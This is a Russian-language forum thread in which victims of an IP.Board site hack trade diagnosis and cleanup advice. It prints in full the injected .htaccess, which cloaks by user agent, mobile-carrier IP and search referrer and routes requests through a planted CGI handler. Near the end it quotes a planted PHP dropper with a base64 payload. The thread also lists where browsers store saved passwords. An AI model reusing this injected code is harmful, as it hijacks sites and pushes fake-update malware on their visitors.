Взлом сайта - обновите ваш браузер Google Chrome

[Quicksdk]

Уже как пару дней как взломан сайт. Не знаю что и делать...

Вообщем сам взлом заключался в том, что бы при переходе из поиска показывать сообщение об обновление браузера. такое сообщение показывалось только на Chrome.

 

Насколько я понял, была добавлена папка cgi-bin (именно была добавлена, потому что изначально я ее удалял) и там уже .htaccess и какой-то скрипт.

 

Я попытался сделать откат к старому бэкапу где все было нормально. Но сейчас он выдает 404

 

Not Found
The requested URL /cgi-bin/php5.2.cgi/index.php was not found on this server.

[egorea1999]

Тебя стилером походу ломанули

[Quicksdk]

Это как?

 

.htaccess положенный в корень сайта

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]



RewriteCond %{REMOTE_ADDR} ^193.201.2(?:29|3[01]) [OR]
RewriteCond %{REMOTE_ADDR} ^213.243.64 [OR]
RewriteCond %{REMOTE_ADDR} ^46.229.1(?:28|3[234]|4[01]) [OR]
RewriteCond %{REMOTE_ADDR} ^83.149.[12389] [OR]
RewriteCond %{REMOTE_ADDR} ^83.149.(?:2[14]|3[4-8]|4[3-79]|5[26-9]|6[0-3]) [OR]
RewriteCond %{REMOTE_ADDR} ^83.149.48.[0-9] [OR]
RewriteCond %{REMOTE_ADDR} ^83.149.48.[1-9][0-9] [OR]
RewriteCond %{REMOTE_ADDR} ^83.149.48.1(?:[01][0-9]|2[0-7]) [OR]
RewriteCond %{REMOTE_ADDR} ^83.229.224 [OR]
RewriteCond %{REMOTE_ADDR} ^85.26.1(?:28|36|55|6[45]|8[346]|9[2-5]) [OR]
RewriteCond %{REMOTE_ADDR} ^85.26.2(?:0[48]|1[26]|2[047-9]|3[0-5]|4[18]) [OR]

RewriteCond %{REMOTE_ADDR} ^80.83.2(?:28|3[0-3]) [OR]
RewriteCond %{REMOTE_ADDR} ^80.83.2(?:24|3[7-9]).[0-9] [OR]
RewriteCond %{REMOTE_ADDR} ^80.83.2(?:24|3[7-9]).[1-9][0-9] [OR]
RewriteCond %{REMOTE_ADDR} ^80.83.2(?:24|3[7-9]).1(?:[01][0-9]|2[0-7]) [OR]
RewriteCond %{REMOTE_ADDR} ^84.17.25[45] [OR]
RewriteCond %{REMOTE_ADDR} ^95.153.1(?:[6-8][0-9]|9[01]) [OR]
RewriteCond %{REMOTE_ADDR} ^95.153.25[2-5] [OR]
RewriteCond %{REMOTE_ADDR} ^194.54.1(?:4[89]|5[01]) [OR]
RewriteCond %{REMOTE_ADDR} ^213.87 [OR]
RewriteCond %{REMOTE_ADDR} ^217.8.2(?:2[6-9]|3[0-49]) [OR]
RewriteCond %{REMOTE_ADDR} ^217.66.1(?:4[6-9]|5[0-26]) [OR]
RewriteCond %{REMOTE_ADDR} ^217.74.24[47].1(?:2[89]|[3-9][0-9]) [OR]
RewriteCond %{REMOTE_ADDR} ^217.74.24[47].2(?:[0-4][0-9]|5[0-5]) [OR]
RewriteCond %{REMOTE_ADDR} ^217.74.2(?:4[589]|5[01])



RewriteCond %{HTTP_REFERER} (ya|yandex|google|mail|rambler|vk) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo! slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]



Options -MultiViews
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

AddDefaultCharset utf-8
Action php5.2-script /cgi-bin/php5.2.cgi
AddType php5.2-script .php

 

 

Определелил еще кое-что. без .htaccess сайт вроде работает нормально ( там есть проблемка с mod_rewrite, но если брать ВООБЩЕ, тогда нормально). Но мне нужен этот .htaccess  и когда я кидаю старый, он у меня перезаписывается...

[_Dark_]

Все в .htaccess замените на

<IfModule mod_rewrite.c>
Options -MultiViews
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule .(jpeg|jpg|gif|png)$ /public/404.php [NC,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

Все лишние файлы поудаляйте.

В сканере IP.Board (центр безопасности) посмотрите есть ли какие-нибудь подозрительные файлы (имена странные), если да — удаляйте.

[Quicksdk]

жесть... у меня в каждой папке .htaccess + в папке cache появились mobileNotification.cgi и w00t.php какие то еще файлы phpшные...

[Pashok(one)]

 

Уже как пару дней как взломан сайт. Не знаю что и делать...

Вообщем сам взлом заключался в том, что бы при переходе из поиска показывать сообщение об обновление браузера. такое сообщение показывалось только на Chrome.

 

Насколько я понял, была добавлена папка cgi-bin (именно была добавлена, потому что изначально я ее удалял) и там уже .htaccess и какой-то скрипт.

 

Я попытался сделать откат к старому бэкапу где все было нормально. Но сейчас он выдает 404

 

Not Found
The requested URL /cgi-bin/php5.2.cgi/index.php was not found on this server.

 

У меня тоже самое!!! на двух сайтах (на трёх) только когда с телефона входишь.

[Quicksdk]

Ну а решение ты нашел?

[Pashok(one)]

Ну а решение ты нашел?

К сожелению нет

[egorea1999]

Многие знают что такое стиллер и принцип его работыИз за стиллера у многих появилась фобия "Запомнить пароль"
Многие боятся хранить свои пароли в браузере, так как стиллер их крадёт
Но есть такая идея, перед которой даже стиллер бессилен
Приступем к самой идеи


как мы знаем пароли в браузерах хранятся в спец. файлов


Google Chrome :


XP -
C:Documents and SettingsUsernameLocal SettingsApplication DataGoogleChromeUser DataDefault
в файле “Web Data”




Vista -
C:UsersUsernameAppdataLocalGoogleChromeUser DataDefault
в файле “Web Data”






Firefox :
Пассы в Firefox хранятся в файле signons.txt или signons2.txt или signons3.txt.


Который лежит тут : [Windows Profil]Application DataMozillaFirefoxProfiles






Opera :
[Windows Profil]Application DataOperaOpera
в файле wand.dat


Но как же их защитить от стиллера ?
вы удивитесь как просто это сделать
вам надо только поменять имя или путь где лежат эти файлы
Для того чтоб поменять имя или путь этих фалов надо открыть настройки браузера
как это делается читаем ниже


Для Firefox
Открываем браузер
В поле для урл пишем about:config и открываем
Если это ваш первый вход то браузер предупредить вас чтоб вы были осторожны
Вам откроется окно где куча настроек
На верху в поле Поиск пишем signon и даем поиск
Поиск найдет 3 файлов “signon.txt” “signon2.txt” “signon3.txt”
Два раза кликаем по этим файлом и меняем имя
Но не забудьте , если вы signon.txt поменяли на pass.txt то signon2.txt должны поменять на pass2.txt
Все после этого перезапустите браузер


ВАЖНО! Перед тем как провернуть такую фишку не забудьте удалить все пароли из файлов “signon.txt” “signon2.txt” “signon3.txt”




Для Opera


Как выше уже отметил пассы от Оперы хранятся в файле wand.dat
Но мы несможем поменять имя файла, вместо этого мы поменяем место хранение файла


Открываем браузер
В поле для урл пишем opera:config и открываем
тут тоже в поле поиск пишем wand.dat
в оуне появляется наш файл и путь где он лежит
нажимаем на обзор и открывается окно где лежит файл
в этом же окне копируем wand.dat а потом переходим назад директорией выше
там создаем новую папку
открываем эту папку и сохраняем файл wand.dat (все эти операции мы делаем в окне которая открылась)
И все выбираем этот файл и нажимаем Ок
и все файл с пассамы теперь будет лежать там куда мы его скопировали
Старый файл уже можно удалять






Вот и все. Уже стиллер несможет украсть ваши пассы. Так как мы поменяли место хранение файла






Для Chrome
В этом браузере мы несможем поменять что то
Но это незначит что мы несможем зашитить свои пассы
Для этого есть спец. программа Chromeplus




Но конечно для всего есть альтернатива
Для тех кто нехочет копаться в настройках есть программа Kasperky Password Manager
Устанавливаем и защищаемся

[_Dark_]

Никакой это не стиллер.

Fensmas, это тот сайт, который мы в прошлый раз от взлома лечили или другой? Патч безопасности стоит?

В рунете уже несколько случаев таких зафиксировано.

[Quicksdk]

Тот же сайт. Патч не стоит. буду обновляться сейчас.

[Pashok(one)]

Тот же сайт. Патч не стоит. буду обновляться сейчас.

Найдёшь решение напиши мне у меня 3 сайта заражены....

[Quicksdk]

Я сделал так: удалил все лишние файлы с cache, удалил все .htaccess во всех папках, и обновил до 3.4. Вроде все.

[Pashok(one)]

Я сделал так: удалил все лишние файлы с cache, удалил все .htaccess во всех папках, и обновил до 3.4. Вроде все.

Надеюсь у тебя всё получилось, помоги мне разобрать файлы cache

Содержимое cache :

 

Cодержимое странных файлов :

htht.php

 

<?set_time_limit(0); 
error_reporting(0);


$codes='CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKUmV3cml0ZUVuZ2luZSBvbgpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYWNzIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGFsYXYgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYWxjYSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBhbW9pIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGF1ZGkgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYXN0ZSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBhdmFuIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGJlbnEgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYmlyZCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBibGFjIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGJsYXogW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYnJldyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBjZWxsIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGNsZGMgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gY21kLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBkYW5nIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGRvY28gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gZXJpYyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBoaXB0IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGlubm8gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gaXBhcSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBqYXZhIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGppZ3MgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0ga2RkaSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBrZWppIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGxlbm8gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbGctYyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBsZy1kIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGxnLWcgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbGdlLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBtYXVpIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1heG8gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbWlkcCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBtaXRzIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1tZWYgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbW9iaSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBtb3QtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1vdG8gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbXdicCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBuZWMtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG5ld3QgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbm9raSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBvcHd2IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHBhbG0gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcGFuYSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBwYW50IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHBkeGcgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcGhpbCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBwbGF5IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHBsdWMgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcG9ydCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBwcm94IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHF0ZWsgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcXdhcCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzYWdlIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNhbXMgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc2FueSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzY2gtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNlYy0gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc2VuZCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzZXJpIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNnaC0gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc2hhciBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzaWUtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNpZW0gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc21hbCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzbWFyIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNvbnkgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc3BoLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzeW1iIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHQtbW8gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gdGVsaSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB0aW0tIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHRvc2ggW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gdHNtLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB1cGcxIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHVwc2kgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gdmstdiBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB2b2RhIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHczY3MgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gd2FwLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3YXBhIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHdhcGkgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gd2FwcCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3YXByIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHdlYmMgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gd2ludyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3aW53IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHhkYSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB4ZGEtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHVwLmJyb3dzZXIgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gdXAubGluayBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3aW5kb3dzLmNlIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGllbW9iaWxlIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1pbmkgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbW1wIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHN5bWJpYW4gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbWlkcCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3YXAgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcGhvbmUgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcG9ja2V0IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1vYmlsZSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBhbmRyb2lkIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IEFuZHJvaWQgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcGRhIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IFBQQyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBTZXJpZXM2MCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBPcGVyYS5NaW5pIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGlwYWQgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gaXBob25lIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGlQYWQgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gaVBob25lIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX0